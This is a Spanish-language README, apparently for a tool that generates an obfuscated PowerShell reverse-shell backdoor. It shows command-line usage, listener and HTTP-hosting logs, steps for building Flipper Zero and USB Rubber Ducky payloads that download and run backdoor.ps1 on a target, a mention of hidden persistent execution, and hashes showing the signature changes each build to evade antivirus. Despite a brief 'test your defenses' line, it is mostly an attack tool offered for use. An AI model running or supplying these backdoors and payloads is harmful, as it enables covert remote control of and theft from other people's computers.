
Puerta trasera inversa escrita en PowerShell y ofuscada con Python. Genera payloads para dispositivos de hacking populares como Flipper Zero y Hak5 USB Rubber Ducky, y cambia su firma después de cada compilación para ayudar a evitar el AV.
/******************************************************************************
Herramienta de puerta trasera inversa escrita en PowerShell y ofuscada con Python, proporcionando una nueva firma tras cada compilación para evitar la detección. La herramienta tiene la capacidad de crear payloads para dispositivos de hacking populares como Flipper Zero y Hak5 USB Rubber Ducky. Utilice esta herramienta para probar las defensas de su sistema contra técnicas de ataque avanzadas.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Se creará un archivo llamado backdoor.ps1 en el directorio de trabajo actual.
Probado en Windows 11, Windows 10 y Kali Linux. Para ejecutarlo como una ventana oculta y con persistencia, siga la guía
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
Al usar cualquiera de estos ataques, abrirá un servidor HTTP que aloja la puerta trasera. Una vez que se recupere la puerta trasera, el servidor HTTP se cerrará.
Lo siguiente generará un archivo llamado powershell_backdoor.txt, que al activarse en el Flipper descargará la puerta trasera de su computadora a través de HTTP y la ejecutará.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Coloque el archivo de texto que haya especificado (por ejemplo: powershell_backdoor.txt) en su Flipper Zero. Cuando se ejecute el payload, descargará y ejecutará backdoor.ps1.
A continuación se muestra un tutorial sobre cómo generar un archivo inject.bin para el Hak5 USB Rubber Ducky.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
Se colocará un archivo llamado inject.bin en su directorio de trabajo actual. Java es necesario para esta función. Cuando se ejecute el payload, descargará y ejecutará backdoor.ps1.
Para codificar payload.txt en inject.bin para ataques USB Rubber Ducky, utilizo encoder.jar creado por .
A continuación se muestra el hash sha1 de backdoor.ps1 tras 5 compilaciones.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49